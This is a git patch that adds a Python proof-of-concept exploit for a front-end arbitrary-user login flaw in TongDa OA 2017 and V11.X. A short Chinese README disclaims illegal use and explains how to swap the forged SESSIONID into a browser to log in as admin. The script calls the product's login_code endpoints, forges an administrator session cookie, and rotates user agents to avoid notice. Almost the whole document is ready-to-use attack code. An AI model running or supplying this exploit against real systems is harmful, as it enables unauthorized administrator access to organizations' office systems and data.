From 785a3cca174e50fdd93578db43dd590c806dbda0 Mon Sep 17 00:00:00 2001 From: dabiaoge <21156949+helloexp@users.noreply.github.com> Date: Thu, 13 Jan 2022 15:48:49 +0800 Subject: [PATCH] =?UTF-8?q?=E6=B7=BB=E5=8A=A0=E9=80=9A=E8=BE=BEOA=20?= =?UTF-8?q?=E6=BC=8F=E6=B4=9E=E5=88=A9=E7=94=A8exp?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- 01-通达OA/POC.py | 113 ++++++++++++++++++++++++++++++++++++++++++++ 01-通达OA/README.md | 13 +++++ 01-通达OA/用法.txt | 1 + 01-通达OA/路径.txt | 1 + 4 files changed, 128 insertions(+) create mode 100644 01-通达OA/POC.py create mode 100644 01-通达OA/README.md create mode 100644 01-通达OA/用法.txt create mode 100644 01-通达OA/路径.txt diff --git a/01-通达OA/POC.py b/01-通达OA/POC.py new file mode 100644 index 0000000..306ba53 --- /dev/null +++ b/01-通达OA/POC.py @@ -0,0 +1,113 @@ +''' +@Author : Sp4ce +@Date : 2020-03-17 23:42:16 +@LastEditors : Sp4ce +@LastEditTime : 2020-04-22 16:24:52 +@Description : Challenge Everything. +''' +import requests +from random import choice +import argparse +import json + +USER_AGENTS = [ + "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)", + "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)", + "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)", + "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)", + "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)", + "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)", + "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)", + "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)", + "Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6", + "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1", + "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0", + "Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5", + "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6", + "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20", + "Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52", + "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.11 TaoBrowser/2.0 Safari/536.11", + "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.71 Safari/537.1 LBBROWSER", + "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; LBBROWSER)", + "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E; LBBROWSER)", + "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.84 Safari/535.11 LBBROWSER", + "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)", + "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; QQBrowser/7.0.3698.400)", + "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)", + "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; QQDownload 732; .NET4.0C; .NET4.0E; 360SE)", + "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)", + "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)", + "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1", + "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1", + "Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; zh-cn) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5", + "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b13pre) Gecko/20110307 Firefox/4.0b13pre", + "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0", + "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11", + "Mozilla/5.0 (X11; U; Linux x86_64; zh-CN; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10" +] + +headers={} + +def getV11Session(url): + checkUrl = url+'/general/login_code.php' + try: + headers["User-Agent"] = choice(USER_AGENTS) + res = requests.get(checkUrl,headers=headers) + resText = str(res.text).split('{') + codeUid = resText[-1].replace('}"}', '').replace('\r\n', '') + getSessUrl = url+'/logincheck_code.php' + res = requests.post( + getSessUrl, data={'CODEUID': '{'+codeUid+'}', 'UID': int(1)},headers=headers) + print('[+]Get Available COOKIE:'+res.headers['Set-Cookie']) + except: + print('[-]Something Wrong With '+url) + + + +def get2017Session(url): + checkUrl = url+'/ispirit/login_code.php' + try: + headers["User-Agent"] = choice(USER_AGENTS) + res = requests.get(checkUrl,headers=headers) + resText = json.loads(res.text) + codeUid = resText['codeuid'] + codeScanUrl = url+'/general/login_code_scan.php' + res = requests.post(codeScanUrl, data={'codeuid': codeUid, 'uid': int( + 1), 'source': 'pc', 'type': 'confirm', 'username': 'admin'},headers=headers) + resText = json.loads(res.text) + status = resText['status'] + if status == str(1): + getCodeUidUrl = url+'/ispirit/login_code_check.php?codeuid='+codeUid + res = requests.get(getCodeUidUrl) + print('[+]Get Available COOKIE:'+res.headers['Set-Cookie']) + else: + print('[-]Something Wrong With '+url + ' Maybe Not Vulnerable ?') + except: + print('[-]Something Wrong With '+url) + + +if __name__ == "__main__": + parser = argparse.ArgumentParser() + parser.add_argument( + "-v", + "--tdoaversion", + type=int, + choices=[11, 2017], + help="Target TongDa OA Version. e.g: -v 11、-v 2017") + parser.add_argument( + "-url", + "--targeturl", + type=str, + help="Target URL. e.g: -url 192.168.2.1、-url http://192.168.2.1" + ) + args = parser.parse_args() + url = args.targeturl + if 'http://' not in url: + url = 'http://' + url + if args.tdoaversion == 11: + getV11Session(url) + elif args.tdoaversion == 2017: + get2017Session(url) + else: + parser.print_help() diff --git a/01-通达OA/README.md b/01-通达OA/README.md new file mode 100644 index 0000000..6a28f20 --- /dev/null +++ b/01-通达OA/README.md @@ -0,0 +1,13 @@ +# TongDaOA-Fake-User +通达OA 前台任意用户登录漏洞 + +**仅供安全研究,禁止非法利用!** + +# 使用方法 +1. python3 poc.py -v 版本 -url url +2. 运行并获取到可用的SESSIONID +3. 替换浏览器Cookie中的SESSIONID即可实现登录为admin + +# 影响范围 + +**通达OA2017、V11.X